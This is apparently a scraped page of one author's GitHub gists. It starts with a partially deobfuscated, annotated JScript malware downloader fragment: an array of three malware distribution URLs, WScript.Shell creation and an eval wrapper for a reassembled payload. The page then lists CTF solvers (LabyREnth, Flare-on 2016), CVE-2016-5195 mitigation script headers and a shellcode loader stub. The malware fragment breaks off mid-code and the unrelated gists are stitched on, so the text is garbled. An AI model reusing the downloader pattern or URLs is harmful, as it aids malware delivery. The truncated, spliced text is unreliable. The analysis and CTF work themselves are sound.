var QSf7 = [OXc9(AAh) + OWVEq9 + (function UNVh7() {
return VXYPv7;
}()) + Pq(Ko) + KAUo + (function FFNu() {
return CCc;
}()) + GHWw2(SJRf) + SKf + Jz + MNx(Gx) + PQq4, KSd + (function NWGd() {
return Ke;
}()) + MEHWy + ETq3 + XIAa + Pu + CKb + VLv5(MTXUp) + Um(TZv3) + UMe + ADSt2, KSd + Ke + Lf6 + (function VBj() {
return ORVx6;
}()) + (function It3() {
return Xd9;
// Partially deobfuscated Windows Script Host (JScript) sample: globals set up before the
// rest of the script runs. The trailing comments on each line appear to record the
// original fragment-concatenated form of the expression.
// The comma operator evaluates both operands and keeps only the last one, so the
// "112" + "313" + "2" concatenation is discarded and keyBuffer is the run of "V" characters.
var keyBuffer = ("112" + "313" + "2","VVVVVVVVVVVVVVVVVVVVVV"); // VVVVV + VVVV + VV + VVVVV + VV + VVVV);
var keybufferLen = keyBuffer.length;
// Second "V" string, assigned directly. NOTE(review): how the three key buffers are used
// is not visible in this excerpt.
var keybuffer2 = "VVVVVVVVVVVVVVVVVVVVV"; //VVVVV + VV + VV + VV + VVVVV + VV + VV + V;
var keybuffer2Len = keybuffer2.length; // keybuffer2[leng + th];
// Same comma-operator pattern as keyBuffer: "asfasdfasfd" is discarded, the value kept is "VVVVV".
var keybuffer3 = ("asfasdfasfd", "VVVVV"); // (asfas + dfasf + d, VVVVV);
var keybuffer3Len = keybuffer3.length; //keybuffer3[leng + th];
// NOTE(review): the role of LUj is not visible in this excerpt.
var LUj = 1;
// NOTE(review): the name and value match ADODB's StreamTypeEnum adTypeText (2); presumably
// used with an ADODB.Stream object later in the script — confirm.
var adTypeText = 2;
// Three plain-HTTP URLs. NOTE(review): the name suggests these are the locations the
// script contacts; their use is not visible here. They can serve as network indicators
// when searching proxy and DNS logs.
var malURL = ["http://sirimba.com.br/qiovtl","http://zakagimebel.ru/krcsvf","http://repair-service.london/uywgi7v"];
// NOTE(review): WScript.CreateObject takes a ProgID string (e.g. "WScript.Shell"); the
// argument here is written as a property access, which looks like an artifact of the
// deobfuscation — confirm against the original sample.
var wsShell = WScript.CreateObject(WScript.Shell);
// Wrapper around a direct eval(): the string passed in is executed as code and its
// completion value is returned. Because it is a direct eval, the code runs in f's scope.
// NOTE(review): presumably this executes the payload reassembled from the fragment array
// that follows — confirm. For static analysis, log the argument instead of evaluating it.
function f(s) {return eval(s);};
var aj85dZA = [';}\n','\xff',
'\r;)','\xff',
'(]e','\xff',
'N +','\xff',
' iC','\xff',
'F[5','\xff',
'pCA','\xff',
' ','\xff',
' \n\r','\xff',
levisre / AntiD_Solver.py
Created August 22, 2016 07:16
LabyREnth Windows #1 - AntiD
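# LabyREnth Windows #1 (AntiD) solver: decodes the byte table below into a
# printable string and prints it. Written to run on both Python 2 and Python 3.
a = [0x8C,0xF1,0x53,0xA3,0x08,0xD7,0xDC,0x48,0xDB,0x0C,0x3A,0xEE,0x15,0x22,0xC4,0xE5,0xC9,0xA0,0xA5,0x0C,0xD3,0xDC,0x51,0xC7,0x39,0xFD,0xD0,0xF8,0x3B,0xE8,0xCC,0x03,0x06,0x43,0xF7,0xDA,0x7E,0x65,0xAE,0x80]

s = ""
d = 0  # running sum of the encoded bytes consumed so far
for i in a:
    # Per-byte transform: XOR with the low byte of the running sum, then
    # +0x66, ^0x55, -0x44, ^0x33, and finally truncate to a single byte.
    s += chr((((((i ^ (d & 0xFF)) + 0x66) ^ 0x55) - 0x44) ^ 0x33) & 0xFF)
    # The key for the next byte depends on every encoded byte seen so far.
    d += i
print(s)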
levisre / cve-2016-5195_mitigation.sh
Created October 26, 2016 07:21
Use systemtap with script to mitigate CVE-2016-5195 (for CentOS vX.X)
#!/bin/sh
###################################
# CVE-2016-5195 Mitigation Script #
###################################
#LINUX_ARCH = $(uname -m)
#KERNEL_VER = $(uname -r)
#NOTE: RUN AS ROOT, MUST BE CONNECTED TO INTERNET
echo "Removing unused kernel-devel..."
levisre / get_package.sh
Last active October 27, 2016 10:22
Bulk crawl and get links to the necessary packages needed to mitigate CVE-2016-5195 with SystemTap on CentOS
#!/bin/sh
#####################################################################
# Get Packages for CVE-2016-5195 mitigation with SystemTap #
# NOTE: SOME CASE IT DOESN'T WORK WITH CentOS 5 #
# Good for bulk download and fix system with various kernel version #
# Written by Levis Nickaster #
#####################################################################
# get kernel version and linux architecture
# Usage: ./get_info.sh <kernel_version> (i686|x86_x64)
levisre / ShellcodeLoader.c
Created November 11, 2016 02:46
Simple Shellcode Loader coded in C. The shellcode must be in binary form
#include <stdio.h>
#include <stdlib.h>
// enable cross compiling
#ifdef __linux__
#include <sys/mman.h>
#elif _WIN32 || _MINGW_
#include <windows.h>
#endif
levisre / Flareon_2016_chall4.c
Created November 11, 2016 02:50
Flare-on 2016 Level 4 Solver
/*
Flare-on 2016 Challenge 4 Solver
By Levis Nickaster.
Note: Put the dll file in the same folder before running the compiled exe
*/
#include <windows.h>
#include <stdio.h>
#define DLL_NAME "flareon2016challenge.dll"
levisre / Flareon_2016_Chall7_Bruteforce.py
Created November 11, 2016 02:57
Flare-on 2016 Challenge 7 Bruteforcer to get original Hash
# Flare-on 2016 Challenge 7 Hashtable Brute-forcer
# Note: It's not a SHA1 brute-forcer
# It prints out all possible values that fulfill the algorithm in the binary file
# The correct hash table is the first one which has "3C" at the first position.
# You can recheck it
hextable = [0x03, 0x72, 0xD7, 0xE5, 0x03, 0xAB, 0xE0, 0xD4, 0x9F, 0xB0, 0xAE, 0x4E, 0x9D, 0x4A, 0x97, 0xAE, 0xE7, 0xEB, 0x42, 0xEF, 0xB0, 0x80, 0x8F, 0x49, 0x9F, 0x1E, 0x28, 0xED, 0x7E, 0x42, 0x80, 0xBC, 0x14, 0xA7, 0x53, 0xA6, 0x0A, 0xA1, 0xDE, 0x43, 0xEC, 0x65, 0xF0, 0x3A, 0x67, 0x66, 0x3C, 0x4A, 0xE7, 0x69, 0xBB, 0x24, 0x25, 0x47, 0x57, 0x2E, 0x59, 0x26, 0x0A, 0x36, 0x95, 0xC4, 0x44, 0xD3, 0xFD, 0x85, 0xB0, 0x47, 0x35, 0xA6, 0x47, 0xBC, 0x83, 0x94, 0xEF, 0x03, 0x6C, 0x73, 0x05, 0xAC, 0xB2, 0x8A, 0xD0, 0x20, 0x9E, 0x7D, 0x18, 0xD4, 0xA6, 0x21, 0xEA, 0x46, 0x03, 0x9E, 0x4D, 0x5F, 0xC9, 0x2E, 0x20, 0xC0, 0xF0, 0x81, 0x17, 0x40, 0x0C, 0x09, 0x5C, 0x57, 0xE4, 0x86, 0x72, 0x05, 0x60, 0x1D, 0x0B, 0x43, 0x5D, 0x4A, 0x34, 0x85, 0x53, 0x10, 0xC
levisre / Flareon_2016_Chall8.py
Created November 11, 2016 03:21
Flare-on 2016 Challenge 8 Solver
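# Flare-on 2016 Challenge 8 solver. Both tables are reversed with [::-1] before
# use, and the decoded text is reversed again to give the final reading order.
# Written to run on both Python 2 and Python 3.
xorTable = [0xC5,0x38,0xE1,0x4A,0x1B,0x0C,0x1A,0x46,0x46,0x0A,0x96,0x29,0x73,0x73,0xA4,0x69,0x03,0x00,0x1B,0xA8,0xF8,0xB8,0x24,0x16,0xD6,0x09,0xCB][::-1]
encodedFlag = [0x8F,0xBC,0xDF,0x23,0x27,0x49,0x34,0x61,0x2F,0xF7,0x8E,0x34,0x67,0x97,0xAB,0x06,0x62,0x69,0xD6,0x7D,0x2F,0xF2,0x1C,0xA3,0xB0,0xAF][::-1]

# Each output character is encodedFlag[i] XORed with two neighbouring xorTable
# bytes; xorTable holds one more entry than encodedFlag, so i + 1 stays in range.
flag = ''.join(
    chr(xorTable[i] ^ xorTable[i + 1] ^ encodedFlag[i])
    for i in range(len(encodedFlag))
)[::-1]
print(flag)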